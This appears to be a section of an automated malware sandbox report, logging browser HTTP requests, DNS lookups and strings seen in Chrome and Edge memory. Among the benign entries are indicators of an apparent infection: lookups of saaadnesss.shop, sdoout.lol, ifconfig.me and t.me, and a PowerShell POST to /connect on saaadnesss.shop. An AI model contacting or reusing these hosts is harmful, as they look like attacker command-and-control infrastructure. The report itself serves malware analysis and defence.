    Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /b?rn=1735660764408&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2A5E9301422D68911D9D866743856932&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1735660764407&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=026bcac3993949958ca71788bb1e040f&activityId=026bcac3993949958ca71788bb1e040f&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=2A5E9301422D68911D9D866743856932; _EDGE_S=F=1&SID=12141DD01C6B6C930BE408B61D416DDA; _EDGE_V=1
    Source: global trafficHTTP traffic detected: GET /b2?rn=1735660764408&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2A5E9301422D68911D9D866743856932&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1947198f5f82c4b68f0d5cb1735660766; XID=1947198f5f82c4b68f0d5cb1735660766
    Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1735660764407&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=026bcac3993949958ca71788bb1e040f&activityId=026bcac3993949958ca71788bb1e040f&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=B3DB3A06CBDF43B98D4B58889567A90D&MUID=2A5E9301422D68911D9D866743856932 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=2A5E9301422D68911D9D866743856932; _EDGE_S=F=1&SID=12141DD01C6B6C930BE408B61D416DDA; _EDGE_V=1; SM=T
    Source: 000003.log8.31.drString found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
    Source: 000003.log8.31.drString found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
    Source: 000003.log8.31.drString found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
    Source: chrome.exe, 00000014.00000003.2481281401.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2481946032.000018080100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2482312625.0000180800438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
    Source: chrome.exe, 00000014.00000003.2481281401.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2481946032.000018080100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2482312625.0000180800438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
    Source: chrome.exe, 00000014.00000003.2521090873.0000180801C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2520909762.0000180801C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
    Source: chrome.exe, 00000014.00000003.2521090873.0000180801C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2520909762.0000180801C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/* equals www.youtube.com (Youtube)
    Source: chrome.exe, 00000014.00000003.2521090873.0000180801C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2520909762.0000180801C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/3 equals www.youtube.com (Youtube)
    Source: chrome.exe, 00000014.00000003.2521090873.0000180801C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2520909762.0000180801C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: pwww.youtube.com/ equals www.youtube.com (Youtube)
    Source: chrome.exe, 00000014.00000003.2521090873.0000180801C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2520909762.0000180801C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com/ equals www.youtube.com (Youtube)
    Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
    Source: global trafficDNS traffic detected: DNS query: ifconfig.me
    Source: global trafficDNS traffic detected: DNS query: saaadnesss.shop
    Source: global trafficDNS traffic detected: DNS query: GeVuzPdhfiKPHBwrLx.GeVuzPdhfiKPHBwrLx
    Source: global trafficDNS traffic detected: DNS query: t.me
    Source: global trafficDNS traffic detected: DNS query: sdoout.lol
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: apis.google.com
    Source: global trafficDNS traffic detected: DNS query: play.google.com
    Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
    Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
    Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
    Source: global trafficDNS traffic detected: DNS query: c.msn.com
    Source: global trafficDNS traffic detected: DNS query: assets.msn.com
    Source: global trafficDNS traffic detected: DNS query: api.msn.com
    Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
    Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
    Source: unknownHTTP traffic detected: POST /connect HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: saaadnesss.shopContent-Length: 31Connection: Keep-Alive
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
    Source: msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
    Source: msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
    Source: msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
